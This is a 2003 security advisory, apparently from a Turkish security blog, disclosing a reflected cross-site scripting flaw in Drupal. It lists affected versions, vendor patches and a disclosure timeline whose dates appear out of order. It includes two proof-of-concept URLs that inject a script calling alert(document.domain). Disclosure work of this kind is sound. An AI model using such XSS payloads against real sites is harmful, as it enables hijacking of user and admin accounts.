Drupal XSS Vulnerability (main page and sub pages)
20.07.2003
Okuyucu : 4.739
Günlük Okuyucu : 2,7
Okuyucu : 4.739
Günlük Okuyucu : 2,7
------------------------------------------------------ Drupal XSS Vulnerability (main page and sub pages) ------------------------------------------------------ Any kind of XSS attacks possibility. An attacker could access other users/admin drupal accounts. ------------------------------------------------------ About Drupal; ------------------------------------------------------ www.drupal.com Drupal is an open-source platform and content management system for building dynamic web sites offering a broad range of features and services including user administration, publishing workflow, discussion capabilities, news aggregation, metadata functionalities using controlled vocabularies and XML publishing for content sharing purposes. Equipped with a powerful blend of features and configurability, Drupal can support a diverse range of web projects ranging from personal weblogs to large community-driven sites. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ TESTED; Drupal 4.2.0 RC NOT TESTED - %90 VULNERABLE; Drupal 4.1.0 Drupal 4.0.0 Drupal 3.0.2 Drupal 3.0.1 Drupal 3.0.0 Drupal 2.0.0 Drupal 1.0.0 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ Drupal 4.2.0 RC ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Vendor replied and fixed quickly. ------------------------------------------------------ Solution & Patches; ------------------------------------------------------ download : http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip xss-cvs.patch xss-4.2.0-rc.patch xss-4.1.0.patch [All files provided by Vendor] ------------------------------------------------------ Exploit Code; ------------------------------------------------------ http://[victim]/xxx"][script]alert(document.domain)]/script][" ------------------------------------------------------ Exploit - 2; ------------------------------------------------------ http://[victim]/node/view/666"><script>alert(document.domain)</script> Replace "<>","[]" ------------------------------------------------------ History; ------------------------------------------------------ 30.05.2003 - Discovered 03.05.2003 - Vendor Informed 03.05.2003 - Fixed by Vendor
Yorumlar
Aşağıdaki form aracılığı ile yorumlarınızı ve fikirlerinizi gönderebilirsiniz. Henüz bu konu hakkında bir yorum yazılmamış.
Yorum Ekle
Drupal XSS Vulnerability (main page and sub pages) ile İlişkili Olabilecek Yazılar - Haberler
RgodMS08-006 Exploit
Flawed CSRF Protections
Exploit Hash
Hala Güvenli misiniz?
Diğer Yazılar
Duvara Karşı
Dvorak Klavye
Dwwork
Easy Thread, GUI' lerde threading için pratik çözüm
Eat the rich
Ebay.de Hack Edildi
Editize ? Peh...
Editplus 2.11
Editplus Update
Eeye' dan Blink Personal
Efsaneler Ölmez, Sadece Şekil Yapar
Egoist Bloglama
E-Gold Baskınları
Ek Bilgi
Ekler & Kaynaklar, Kaynakça, Referanslar, Kablosuz Ağlara Saldırı & Defans - 6
Ekşi Sözlük Üye Alımı
Ekstra Ekipmanlar, Antenler ve Defans, Kablosuz Ağlara Saldırı & Defans - 5
ElseNot, Exploit Manyaklığı
Emule Kad (Kademlia) ve Edonkey Networkleri
Neredeyim ?
Ferruh.Mavituna » Advisories » Drupal XSS Vulnerability (main page and sub pages)